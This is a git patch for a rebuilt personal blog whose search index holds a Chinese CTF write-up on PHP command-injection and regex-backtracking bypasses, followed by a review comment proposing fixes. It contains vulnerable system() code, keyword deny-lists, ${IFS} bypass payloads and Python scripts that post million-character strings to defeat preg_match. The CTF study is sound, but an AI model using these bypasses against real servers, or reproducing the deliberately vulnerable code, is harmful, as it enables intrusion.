From 95a72c3d56ea7814763c88a40f7d22f87e31713b Mon Sep 17 00:00:00 2001
From: harmor123
Date: Sun, 29 Oct 2023 14:32:58 +0800
Subject: [PATCH] Site updated: 2023-10-29 14:32:57
---
2023/10/24/hello-world/index.html | 2 +-
2023/10/24/test/index.html | 5 +++--
404.html | 2 +-
archives/2023/10/index.html | 2 +-
archives/2023/index.html | 2 +-
archives/index.html | 2 +-
atom.xml | 4 ++--
index.html | 2 +-
search.xml | 2 +-
9 files changed, 12 insertions(+), 11 deletions(-)
diff --git a/2023/10/24/hello-world/index.html b/2023/10/24/hello-world/index.html
index 94b5b4b..751e0fe 100644
--- a/2023/10/24/hello-world/index.html
+++ b/2023/10/24/hello-world/index.html
@@ -1094,7 +1094,7 @@ 你的赏识是我前进的动力
站点总字数: 404
+ class="white-color">405
diff --git a/2023/10/24/test/index.html b/2023/10/24/test/index.html
index 3f80575..2826ff7 100644
--- a/2023/10/24/test/index.html
+++ b/2023/10/24/test/index.html
@@ -401,7 +401,7 @@ test
文章字数:
- 331
+ 332
@@ -445,6 +445,7 @@
+123
@@ -1097,7 +1098,7 @@ 你的赏识是我前进的动力
站点总字数: 404
+ class="white-color">405
diff --git a/404.html b/404.html
index 6b3189b..a17e465 100644
--- a/404.html
+++ b/404.html
@@ -454,7 +454,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/archives/2023/10/index.html b/archives/2023/10/index.html
index 20f02b1..9c751f8 100644
--- a/archives/2023/10/index.html
+++ b/archives/2023/10/index.html
@@ -682,7 +682,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/archives/2023/index.html b/archives/2023/index.html
index 912b80d..e0ef603 100644
--- a/archives/2023/index.html
+++ b/archives/2023/index.html
@@ -682,7 +682,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/archives/index.html b/archives/index.html
index c2f79d2..93b4265 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -682,7 +682,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/atom.xml b/atom.xml
index a4b444e..164823c 100644
--- a/atom.xml
+++ b/atom.xml
@@ -6,7 +6,7 @@
- 2023-10-29T04:28:17.636Z
+ 2023-10-29T06:32:34.600Z
https://harmor123.github.io/harmor.github.io/
@@ -21,7 +21,7 @@
https://harmor123.github.io/harmor.github.io/2023/10/24/test/
2023-10-24T12:25:59.000Z
- 2023-10-29T04:28:17.636Z
+ 2023-10-29T06:32:34.600Z
diff --git a/index.html b/index.html
index c0a6a42..51f3456 100644
--- a/index.html
+++ b/index.html
@@ -754,7 +754,7 @@
站点总字数: 404
+ class="white-color">405
diff --git a/search.xml b/search.xml
index 9ce8064..5a863df 100644
--- a/search.xml
+++ b/search.xml
@@ -8,7 +8,7 @@
/harmor.github.io/2023/10/24/test/
- 1.ez_rce1 2 3 4 5 6 7 8 9 10 11 12 13
| <?php
$rce = $_GET['rce']; if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; } } else { highlight_file(__FILE__); }
|
1 2 3 4 5 6 7 8 9 10 11
| ?rce=ls ?rce=cp${IFS}fla?.php${IFS}a.txt
<?php $flag = getenv('GZCTF_FLAG'); if($flag=="not_flag" or $flag==""){ $flag="dzctf{test_flag}"; }
?rce=ls${IFS}/ ?rce=cp${IFS}/fla?${IFS}a.php
|
2.ez_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| <?php error_reporting(0); highlight_file('./index.txt'); if(isset($_POST['c_ode']) && isset($_GET['num'])) { $code = (String)$_POST['c_ode']; $num=$_GET['num']; if(preg_match("/[0-9]/", $num)) { die("no number!"); } elseif(intval($num)) { if(preg_match('/.+?SHCTF/is', $code)) { die('no touch!'); } if(stripos($code,'2023SHCTF') === FALSE) { die('what do you want'); } echo $flag; } }
|
PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN
回溯法绕过正则匹配
1 2 3 4 5 6 7
| import requests url="http://112.6.51.212:31842/?num[]=1" data={ 'c[ode':'a'*1000000+'2023SHCTF' } r=requests.post(url,data=data) print(r.text)
|
本题与下面一道题进行对比:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| <?php
$as=$_POST['as']; $code = $_POST['code'];
function process($code){ return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code); }
if(!is_array($as)){
if(!preg_match_all('/but.*how/is',$as)){
if(strpos($as,'but how')!==false){ system(process($code)); }else{ die('tip: backup file there'); }
}else{ die('NO there'); } } ?>
|
1 2 3 4 5 6 7 8
| import requests url="" data={ 'as':'but how'+'a'*1000000, 'code':'sort /flflagag' } r=requests.post(url,data=data) print(r.text)
|
正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。
[PHP] strpos stripos strrpos strripos的区别-CSDN博客
]]>
+ 1.ez_rce1 2 3 4 5 6 7 8 9 10 11 12 13
| <?php
$rce = $_GET['rce']; if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; } } else { highlight_file(__FILE__); }
|
1 2 3 4 5 6 7 8 9 10 11
| ?rce=ls ?rce=cp${IFS}fla?.php${IFS}a.txt
<?php $flag = getenv('GZCTF_FLAG'); if($flag=="not_flag" or $flag==""){ $flag="dzctf{test_flag}"; }
?rce=ls${IFS}/ ?rce=cp${IFS}/fla?${IFS}a.php
|
2.ez_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| <?php error_reporting(0); highlight_file('./index.txt'); if(isset($_POST['c_ode']) && isset($_GET['num'])) { $code = (String)$_POST['c_ode']; $num=$_GET['num']; if(preg_match("/[0-9]/", $num)) { die("no number!"); } elseif(intval($num)) { if(preg_match('/.+?SHCTF/is', $code)) { die('no touch!'); } if(stripos($code,'2023SHCTF') === FALSE) { die('what do you want'); } echo $flag; } }
|
PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval绕过-CSDN
回溯法绕过正则匹配
1 2 3 4 5 6 7
| import requests url="http://112.6.51.212:31842/?num[]=1" data={ 'c[ode':'a'*1000000+'2023SHCTF' } r=requests.post(url,data=data) print(r.text)
|
本题与下面一道题进行对比:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| <?php
$as=$_POST['as']; $code = $_POST['code'];
function process($code){ return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code); }
if(!is_array($as)){
if(!preg_match_all('/but.*how/is',$as)){
if(strpos($as,'but how')!==false){ system(process($code)); }else{ die('tip: backup file there'); }
}else{ die('NO there'); } } ?>
|
1 2 3 4 5 6 7 8
| import requests url="" data={ 'as':'but how'+'a'*1000000, 'code':'sort /flflagag' } r=requests.post(url,data=data) print(r.text)
|
正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数。
[PHP] strpos stripos strrpos strripos的区别-CSDN博客
123
]]>
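Review bot: The closing sentence of the post text on the new side (`正则回溯地方不同点在于前者是stripos()函数,后者是strpos()函数`) attributes the difference between the two challenges to stripos() versus strpos(), but the listings, read with the post's own heading `回溯法绕过正则匹配`, suggest a different root cause that the write-up never states. Both guards test the PCRE result loosely, `if(preg_match('/.+?SHCTF/is', $code))` and `if(!preg_match_all('/but.*how/is',$as))`, so the `false` these functions return on an engine error (for example when `pcre.backtrack_limit` is exceeded) is treated as "no match" and the check fails open. I would add one sentence saying so, with the hardened form beside it: `if (preg_match('/.+?SHCTF/is', $code) !== 0) { die('no touch!'); }`, which rejects anything other than a clean 0, optionally followed by a `preg_last_error()` check for logging. The first listing deserves a matching remark that a deny-list in front of `system($rce)` cannot be made complete, and that the fix is to keep request input out of the shell and dispatch on a fixed allow-list of actions instead. The trailing `123` added to the post body looks like a test edit and probably should not ship in the published search index.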